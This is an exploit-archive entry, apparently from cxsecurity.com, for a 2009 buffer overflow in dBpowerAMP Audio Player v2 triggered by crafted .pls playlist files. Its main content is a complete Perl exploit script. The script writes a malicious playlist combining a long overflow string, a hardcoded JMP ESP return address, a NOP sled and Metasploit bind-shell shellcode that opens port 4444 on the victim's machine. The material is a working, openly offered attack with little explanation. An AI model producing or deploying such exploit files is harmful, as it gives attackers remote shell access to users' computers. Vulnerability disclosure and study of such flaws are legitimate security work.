dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit

2009.01.30
Credit: AlpHaNiX
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: N/A

# dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit # Exploited By AlpHaNiX # From NullArea.Net # Thanks Stack For The PoC system("cls") ; print "\n\n\n[+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit" ; my $blah= "\x41" x 600; my $nop = "\x90" x 52 ; my $ret = "\xC7\xEB\xFA\x75" ; # 77C80F1A JMP ESP [ntdll v6.0 vista en ultimate] # win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50". "\x80\x56\xea\x83\xeb\xfc\xe2\xf4\xac\xea\xbd\xa7\xb8\x79\xa9\x15". "\xaf\xe0\xdd\x86\x74\xa4\xdd\xaf\x6c\x0b\x2a\xef\x28\x81\xb9\x61". "\x1f\x98\xdd\xb5\x70\x81\xbd\xa3\xdb\xb4\xdd\xeb\xbe\xb1\x96\x73". "\xfc\x04\x96\x9e\x57\x41\x9c\xe7\x51\x42\xbd\x1e\x6b\xd4\x72\xc2". "\x25\x65\xdd\xb5\x74\x81\xbd\x8c\xdb\x8c\x1d\x61\x0f\x9c\x57\x01". "\x53\xac\xdd\x63\x3c\xa4\x4a\x8b\x93\xb1\x8d\x8e\xdb\xc3\x66\x61". "\x10\x8c\xdd\x9a\x4c\x2d\xdd\xaa\x58\xde\x3e\x64\x1e\x8e\xba\xba". "\xaf\x56\x30\xb9\x36\xe8\x65\xd8\x38\xf7\x25\xd8\x0f\xd4\xa9\x3a". "\x38\x4b\xbb\x16\x6b\xd0\xa9\x3c\x0f\x09\xb3\x8c\xd1\x6d\x5e\xe8". "\x05\xea\x54\x15\x80\xe8\x8f\xe3\xa5\x2d\x01\x15\x86\xd3\x05\xb9". "\x03\xd3\x15\xb9\x13\xd3\xa9\x3a\x36\xe8\x47\xb6\x36\xd3\xdf\x0b". "\xc5\xe8\xf2\xf0\x20\x47\x01\x15\x86\xea\x46\xbb\x05\x7f\x86\x82". "\xf4\x2d\x78\x03\x07\x7f\x80\xb9\x05\x7f\x86\x82\xb5\xc9\xd0\xa3". "\x07\x7f\x80\xba\x04\xd4\x03\x15\x80\x13\x3e\x0d\x29\x46\x2f\xbd". "\xaf\x56\x03\x15\x80\xe6\x3c\x8e\x36\xe8\x35\x87\xd9\x65\x3c\xba". "\x09\xa9\x9a\x63\xb7\xea\x12\x63\xb2\xb1\x96\x19\xfa\x7e\x14\xc7". "\xae\xc2\x7a\x79\xdd\xfa\x6e\x41\xfb\x2b\x3e\x98\xae\x33\x40\x15". "\x25\xc4\xa9\x3c\x0b\xd7\x04\xbb\x01\xd1\x3c\xeb\x01\xd1\x03\xbb". "\xaf\x50\x3e\x47\x89\x85\x98\xb9\xaf\x56\x3c\x15\xaf\xb7\xa9\x3a". "\xdb\xd7\xaa\x69\x94\xe4\xa9\x3c\x02\x7f\x86\x82\xa0\x0a\x52\xb5". "\x03\x7f\x80\x15\x80\x80\x56\xea"; my $buff = $blah.$ret.$nop.$shellcode ; open(pls, "> alp1x.pls"); my $plsfile = '[playlist]'."\r\n". 'NumberOfEntries=1'."\r\n". "File1=http://".$buff ; print pls $plsfile ; close (pls); print "\n[!] File Creation Done !";

References:

http://seclists.org/bugtraq/2009/Jan/0275.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top